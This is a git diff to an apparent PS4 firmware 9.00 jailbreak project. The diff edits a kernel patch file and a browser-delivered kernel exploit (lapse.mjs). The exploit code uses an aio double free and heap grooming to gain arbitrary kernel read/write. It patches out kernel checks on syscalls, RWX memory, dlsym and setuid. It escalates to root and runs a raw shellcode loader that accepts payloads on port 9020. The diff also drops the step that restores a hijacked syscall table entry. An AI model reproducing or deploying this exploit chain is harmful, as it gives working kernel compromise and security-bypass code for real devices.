diff --git a/kpatch/900.c b/kpatch/900.c
index ef99a9f..2ff5a67 100644
--- a/kpatch/900.c
+++ b/kpatch/900.c
@@ -16,7 +16,6 @@ You should have received a copy of the GNU Affero General Public License
along with this program. If not, see . */
#include
-#include
#include "types.h"
#include "utils.h"
@@ -58,123 +57,51 @@ void do_patch(void) {
void * const kbase = (void *)rdmsr(0xC0000082) - off_fast_syscall;
disable_cr0_wp();
-
- // patch amd64_syscall() to allow calling syscalls everywhere
-
- // struct syscall_args sa; // initialized already
- // u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
- // int is_invalid_syscall = 0
- //
- // // check the calling code if it looks like one of the syscall stubs at a
- // // libkernel library and check if the syscall number correponds to the
- // // proper stub
- // if ((code & 0xff0000000000ffff) != 0x890000000000c0c7
- // || sa.code != (u32)(code >> 0x10)
- // ) {
- // // patch this to " = 0" instead
- // is_invalid_syscall = -1;
- // }
- write32(kbase, 0x490, 0);
- // these code corresponds to the check that ensures that the caller's
- // instruction pointer is inside the libkernel library's memory range
- //
- // // patch the check to always go to the "goto do_syscall;" line
- // void *code = td->td_frame->tf_rip;
- // if (libkernel->start <= code && code < libkernel->end
- // && is_invalid_syscall == 0
- // ) {
- // goto do_syscall;
- // }
- //
- // do_syscall:
- // ...
- // lea rsi, [rbp - 0x78]
- // mov rdi, rbx
- // mov rax, qword [rbp - 0x80]
- // call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
- //
- // sy_call() is the function that will execute the requested syscall.
- write16(kbase, 0x4b5, 0x9090);
- write16(kbase, 0x4b9, 0x9090);
- write8(kbase, 0x4c2, 0xeb);
-
- // patch sys_mmap() to allow rwx mappings
-
- // patch maximum cpu mem protection: 0x33 -> 0x37
- // the ps4 added custom protections for their gpu memory accesses
- // GPU X: 0x8 R: 0x10 W: 0x20
- // that's why you see other bits set
- // ref: https://cturt.github.io/ps4-2.html
- write8(kbase, 0x16632a, 0x37);
- write8(kbase, 0x16632d, 0x37);
-
- // patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
- //
- // this check is skipped after the patch
- //
- // if ((new_prot & current->max_protection) != new_prot) {
- // vm_map_unlock(map);
- // return (KERN_PROTECTION_FAILURE);
- // }
- write32(kbase, 0x80b8d, 0);
-
- // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
-
- // call ...
- // mov r14, qword [rbp - 0xad0]
- // cmp eax, 0x4000000
- // jb ... ; patch jb to jmp
- write8(kbase, 0x23B67F, 0xeb);
- // patch called function to always return 0
- //
- // sys_dynlib_dlsym:
- // ...
- // mov edi, 0x10 ; 16
- // call patched_function ; kernel_base + 0x951c0
- // test eax, eax
- // je ...
- // mov rax, qword [rbp - 0xad8]
- // ...
- // patched_function: ; patch to "xor eax, eax; ret"
- // push rbp
- // mov rbp, rsp
- // ...
- write32(kbase, 0x221B40, 0xC3C03148);
-
- // patch sys_setuid() to allow freely changing the effective user ID
-
- // ; PRIV_CRED_SETUID = 50
- // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
- // test eax, eax
- // je ... ; patch je to jmp
- write8(kbase, 0x1A06, 0xeb);
-
- // patch sysveri to prevent delayed panics
- write16(kbase, 0x626874, 0x9090);
-
- // overwrite the entry of syscall 11 (unimplemented) in sysent
- //
- // struct args {
- // u64 rdi;
- // u64 rsi;
- // u64 rdx;
- // u64 rcx;
- // u64 r8;
- // u64 r9;
- // };
- //
- // int sys_kexec(struct thread td, struct args *uap) {
- // asm("jmp qword ptr [rsi]");
- // }
-
- // sysent[11]
+ //ChendoChap Patches For 900
+ const size_t KERNEL_enable_syscalls_1 = 0x490;
+ const size_t KERNEL_enable_syscalls_2 = 0x4B5;
+ const size_t KERNEL_enable_syscalls_3 = 0x4B9;
+ const size_t KERNEL_enable_syscalls_4 = 0x4C2;
+ const size_t KERNEL_mprotect = 0x80B8D;
+ const size_t KERNEL_prx = 0x23AEC4;
+ const size_t KERNEL_mmap_1 = 0x16632A;
+ const size_t KERNEL_mmap_2 = 0x16632D;
+ const size_t KERNEL_dlsym_1 = 0x23B67F;
+ const size_t KERNEL_dlsym_2 = 0x221b40;
+ const size_t KERNEL_setuid = 0x1A06;
+ const size_t KERNEL_bzero = 0x2713FD;
+ const size_t KERNEL_pagezero = 0x271441;
+ const size_t KERNEL_memcpy = 0x2714BD;
+ const size_t KERNEL_pagecopy = 0x271501;
+ const size_t KERNEL_copyin = 0x2716AD;
+ const size_t KERNEL_copyinstr = 0x271B5D;
+ const size_t KERNEL_copystr = 0x271C2D;
+ const size_t KERNEL_veriPatch = 0x626874;
+ const size_t KERNEL_setcr0_patch = 0x3ade3B;
+ write32(kbase, KERNEL_enable_syscalls_1, 0);
+ write16(kbase, KERNEL_enable_syscalls_2, 0x9090);
+ write16(kbase, KERNEL_enable_syscalls_3, 0x9090);
+ write8(kbase, KERNEL_enable_syscalls_4, 0xEB);
+ write8(kbase, KERNEL_mmap_1, 0x37);
+ write8(kbase, KERNEL_mmap_2, 0x37);
+ write32(kbase, KERNEL_mprotect, 0);
+ write8(kbase, KERNEL_dlsym_1, 0xEB);
+ write32(kbase, KERNEL_dlsym_2, 0xC3C03148);
+ write8(kbase, KERNEL_setuid, 0xEB);
+ write16(kbase, KERNEL_prx, 0xE990);
+ write8(kbase, KERNEL_bzero, 0xEB);
+ write8(kbase, KERNEL_pagezero, 0xEB);
+ write8(kbase, KERNEL_memcpy, 0xEB);
+ write8(kbase, KERNEL_pagecopy, 0xEB);
+ write8(kbase, KERNEL_copyin, 0xEB);
+ write8(kbase, KERNEL_copyinstr, 0xEB);
+ write8(kbase, KERNEL_copystr, 0xEB);
+ write16(kbase, KERNEL_veriPatch, 0x9090);
+ write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);
const size_t offset_sysent_11 = 0x1100520;
- // .sy_narg = 6
- write32(kbase, offset_sysent_11, 6);
- // .sy_call = gadgets['jmp qword ptr [rsi]']
+ write32(kbase, offset_sysent_11, 2);
write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
- // .sy_thrcnt = SY_THR_STATIC
- write32(kbase, offset_sysent_11 + 0x2c, 1);
+ write32(kbase, offset_sysent_11 + 0x2c, 1);
enable_cr0_wp();
}
\ No newline at end of file
diff --git a/kpatch/900.elf b/kpatch/900.elf
index 0e02611..a38fa6b 100644
Binary files a/kpatch/900.elf and b/kpatch/900.elf differ
diff --git a/kpatch/900.o b/kpatch/900.o
index febc978..2e7e5be 100644
Binary files a/kpatch/900.o and b/kpatch/900.o differ
diff --git a/lapse.mjs b/lapse.mjs
old mode 100644
new mode 100755
index 70c819a..73afe82
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -96,9 +96,6 @@ const CPU_LEVEL_WHICH = 3;
const CPU_WHICH_TID = 1;
// sys/mman.h
-const PROT_READ = 1;
-const PROT_WRITE = 2;
-const PROT_EXEC = 4;
const MAP_SHARED = 1;
const MAP_FIXED = 0x10;
@@ -136,14 +133,14 @@ const main_core = 7;
const num_grooms = 0x200;
const num_handles = 0x100;
const num_sds = 0x100; // max is 0x100 due to max IPV6_TCLASS
-const num_alias = 50; //TODO: check best value here for 9.xx
+const num_alias = 10;
const num_races = 100;
const leak_len = 16;
const num_leaks = 5;
const num_clobbers = 8;
-var nogc = [];
let chain = null;
+var nogc = [];
async function init() {
await rop.init();
@@ -1461,17 +1458,17 @@ function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
die('pipe read failed');
}
log('achieved arbitrary kernel read/write');
-
- // RESTORE: clean corrupt pointers
- // pktopts.ip6po_rthdr = NULL
- const off_ip6po_rthdr = is_ps4 ? 0x68 : 0x70;
- const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
- const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
- kmem.write64(r_rthdr_p, 0);
- kmem.write64(w_rthdr_p, 0);
- log('corrupt pointers cleaned');
-
+ // RESTORE: clean corrupt pointer
+ // pktopts.ip6po_rthdr = NULL
+ //ABC Patch
+ const off_ip6po_rthdr = 0x68;
+ const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
+ const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
+ kmem.write64(r_rthdr_p, 0);
+ kmem.write64(w_rthdr_p, 0);
+ log('corrupt pointers cleaned');
+
/*
// REMOVE once restore kernel is ready for production
// increase the ref counts to prevent deallocation
@@ -1508,10 +1505,6 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
// sysent[661] is unimplemented so free for use
const offset_sysent_661 = 0x1107f00;
const sysent_661 = kbase.add(offset_sysent_661);
- const sy_narg = kmem.read32(sysent_661);
- const sy_call = kmem.read64(sysent_661.add(8));
- const sy_thrcnt = kmem.read32(sysent_661.add(0x2c));
-
// .sy_narg = 6
kmem.write32(sysent_661, 6);
// .sy_call = gadgets['jmp qword ptr [rsi]']
@@ -1601,14 +1594,6 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
log('setuid(0)');
sysi('setuid', 0);
log('kernel exploit succeeded!');
-
- log('restore sys_aio_submit()');
- kmem.write32(sysent_661, sy_narg);
- // .sy_call = gadgets['jmp qword ptr [rsi]']
- kmem.write64(sysent_661.add(8), sy_call);
- // .sy_thrcnt = SY_THR_STATIC
- kmem.write32(sysent_661.add(0x2c), sy_thrcnt);
-
alert("kernel exploit succeeded!");
}
@@ -1631,6 +1616,20 @@ function setup(block_fd) {
}
aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);
+ {
+ const reqs1 = make_reqs1(1);
+ const timo = new Word(1);
+ const id = new Word();
+ aio_submit_cmd(AIO_CMD_READ, reqs1.addr, 1, id.addr);
+ chain.do_syscall_clear_errno(
+ 'aio_multi_wait', id.addr, 1, _aio_errors_p, 1, timo.addr);
+ const err = chain.errno;
+ if (err !== 60) { // ETIMEDOUT
+ die(`SceAIO system not blocked. errno: ${err}`);
+ }
+ free_aios(id.addr, 1);
+ }
+
log('heap grooming');
// chosen to maximize the number of 0x80 malloc allocs per submission
const num_reqs = 3;
@@ -1643,6 +1642,48 @@ function setup(block_fd) {
return [block_id, groom_ids];
}
+function runBinLoader() {
+ var payload_buffer = chain.sysp('mmap', 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
+ var payload_loader = malloc32(0x1000);
+ var BLDR = payload_loader.backing;
+ BLDR[0] = 0x56415741; BLDR[1] = 0x83485541; BLDR[2] = 0x894818EC;
+ BLDR[3] = 0xC748243C; BLDR[4] = 0x10082444; BLDR[5] = 0x483C2302;
+ BLDR[6] = 0x102444C7; BLDR[7] = 0x00000000; BLDR[8] = 0x000002BF;
+ BLDR[9] = 0x0001BE00; BLDR[10] = 0xD2310000; BLDR[11] = 0x00009CE8;
+ BLDR[12] = 0xC7894100; BLDR[13] = 0x8D48C789; BLDR[14] = 0xBA082474;
+ BLDR[15] = 0x00000010; BLDR[16] = 0x000095E8; BLDR[17] = 0xFF894400;
+ BLDR[18] = 0x000001BE; BLDR[19] = 0x0095E800; BLDR[20] = 0x89440000;
+ BLDR[21] = 0x31F631FF; BLDR[22] = 0x0062E8D2; BLDR[23] = 0x89410000;
+ BLDR[24] = 0x2C8B4CC6; BLDR[25] = 0x45C64124; BLDR[26] = 0x05EBC300;
+ BLDR[27] = 0x01499848; BLDR[28] = 0xF78944C5; BLDR[29] = 0xBAEE894C;
+ BLDR[30] = 0x00001000; BLDR[31] = 0x000025E8; BLDR[32] = 0x7FC08500;
+ BLDR[33] = 0xFF8944E7; BLDR[34] = 0x000026E8; BLDR[35] = 0xF7894400;
+ BLDR[36] = 0x00001EE8; BLDR[37] = 0x2414FF00; BLDR[38] = 0x18C48348;
+ BLDR[39] = 0x5E415D41; BLDR[40] = 0x31485F41; BLDR[41] = 0xC748C3C0;
+ BLDR[42] = 0x000003C0; BLDR[43] = 0xCA894900; BLDR[44] = 0x48C3050F;
+ BLDR[45] = 0x0006C0C7; BLDR[46] = 0x89490000; BLDR[47] = 0xC3050FCA;
+ BLDR[48] = 0x1EC0C748; BLDR[49] = 0x49000000; BLDR[50] = 0x050FCA89;
+ BLDR[51] = 0xC0C748C3; BLDR[52] = 0x00000061; BLDR[53] = 0x0FCA8949;
+ BLDR[54] = 0xC748C305; BLDR[55] = 0x000068C0; BLDR[56] = 0xCA894900;
+ BLDR[57] = 0x48C3050F; BLDR[58] = 0x006AC0C7; BLDR[59] = 0x89490000;
+ BLDR[60] = 0xC3050FCA;
+
+ chain.sys('mprotect', payload_loader, 0x4000, (0x1 | 0x2 | 0x4));
+
+ var pthread = malloc(0x10);
+ sysi('mlock', payload_buffer, 0x300000);
+
+ call_nze(
+ 'pthread_create',
+ pthread,
+ 0,
+ payload_loader,
+ payload_buffer
+ );
+
+ log('BinLoader is ready. Send a payload to port 9020 now');
+}
+
// overview:
// * double free a aio_entry (resides at a 0x80 malloc zone)
// * type confuse a evf and a ip6_rthdr
@@ -1669,7 +1710,7 @@ export async function kexploit() {
if (sysi('setuid', 0) == 0) {
log("Not running kexploit again.");
runBinLoader();
- return new Promise(() => {});
+ return;
}
}
catch (e) {}
@@ -1749,67 +1790,6 @@ export async function kexploit() {
}
}
-function runBinLoader() {
- /* BinLoader by ps3120 */
- var payload_buffer = chain.sysp('mmap', 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
- var payload_loader = malloc32(0x1000);
- var BLDR = payload_loader.backing;
- BLDR[0] = 0x56415741; BLDR[1] = 0x83485541; BLDR[2] = 0x894818EC;
- BLDR[3] = 0xC748243C; BLDR[4] = 0x10082444; BLDR[5] = 0x483C2302;
- BLDR[6] = 0x102444C7; BLDR[7] = 0x00000000; BLDR[8] = 0x000002BF;
- BLDR[9] = 0x0001BE00; BLDR[10] = 0xD2310000; BLDR[11] = 0x00009CE8;
- BLDR[12] = 0xC7894100; BLDR[13] = 0x8D48C789; BLDR[14] = 0xBA082474;
- BLDR[15] = 0x00000010; BLDR[16] = 0x000095E8; BLDR[17] = 0xFF894400;
- BLDR[18] = 0x000001BE; BLDR[19] = 0x0095E800; BLDR[20] = 0x89440000;
- BLDR[21] = 0x31F631FF; BLDR[22] = 0x0062E8D2; BLDR[23] = 0x89410000;
- BLDR[24] = 0x2C8B4CC6; BLDR[25] = 0x45C64124; BLDR[26] = 0x05EBC300;
- BLDR[27] = 0x01499848; BLDR[28] = 0xF78944C5; BLDR[29] = 0xBAEE894C;
- BLDR[30] = 0x00001000; BLDR[31] = 0x000025E8; BLDR[32] = 0x7FC08500;
- BLDR[33] = 0xFF8944E7; BLDR[34] = 0x000026E8; BLDR[35] = 0xF7894400;
- BLDR[36] = 0x00001EE8; BLDR[37] = 0x2414FF00; BLDR[38] = 0x18C48348;
- BLDR[39] = 0x5E415D41; BLDR[40] = 0x31485F41; BLDR[41] = 0xC748C3C0;
- BLDR[42] = 0x000003C0; BLDR[43] = 0xCA894900; BLDR[44] = 0x48C3050F;
- BLDR[45] = 0x0006C0C7; BLDR[46] = 0x89490000; BLDR[47] = 0xC3050FCA;
- BLDR[48] = 0x1EC0C748; BLDR[49] = 0x49000000; BLDR[50] = 0x050FCA89;
- BLDR[51] = 0xC0C748C3; BLDR[52] = 0x00000061; BLDR[53] = 0x0FCA8949;
- BLDR[54] = 0xC748C305; BLDR[55] = 0x000068C0; BLDR[56] = 0xCA894900;
- BLDR[57] = 0x48C3050F; BLDR[58] = 0x006AC0C7; BLDR[59] = 0x89490000;
- BLDR[60] = 0xC3050FCA;
-
- chain.sys('mprotect', payload_loader, 0x4000, (0x1 | 0x2 | 0x4));
-
- var pthread = malloc(0x10);
- sysi('mlock', payload_buffer, 0x300000);
-
- call_nze(
- 'pthread_create',
- pthread,
- 0,
- payload_loader,
- payload_buffer
- );
-
- log('BinLoader is ready. Send a payload to port 9020 now');
-}
-
-//For some reason this payload loader version does KP.
-/*kexploit().then(() => {
- var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, PROT_READ | PROT_WRITE | PROT_EXEC, 0x41000, -1, 0);
- var payload_loader = new View4(window.pld);
- chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC);
- const ctx = new Buffer(0x10);
- const pthread = new Pointer();
- pthread.ctx = ctx;
-
- call_nze(
- 'pthread_create',
- pthread.addr,
- 0,
- payload_loader.addr,
- payload_buffer,
- );
-})*/
-
function malloc(sz) {
var backing = new Uint8Array(0x10000 + sz);
@@ -1827,7 +1807,9 @@ function malloc32(sz) {
return ptr;
}
+
kexploit().then(() => {
+
window.pld_size = new Int(0x26200000, 0x9);
var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
diff --git a/payload.js b/payload.js
index 1ba4d7f..f6a82e5 100644
--- a/payload.js
+++ b/payload.js
@@ -1,7 +1,6 @@
if (sessionStorage.getItem('jbsuccess')) {
sessionStorage.setItem('binloader', 1);
} else {
- sessionStorage.removeItem('binloader');
fetch('./payload.bin').then(res => {
res.arrayBuffer().then(arr => {
window.pld = new Uint32Array(arr);
@@ -9,4 +8,3 @@ if (sessionStorage.getItem('jbsuccess')) {
})
})
}
-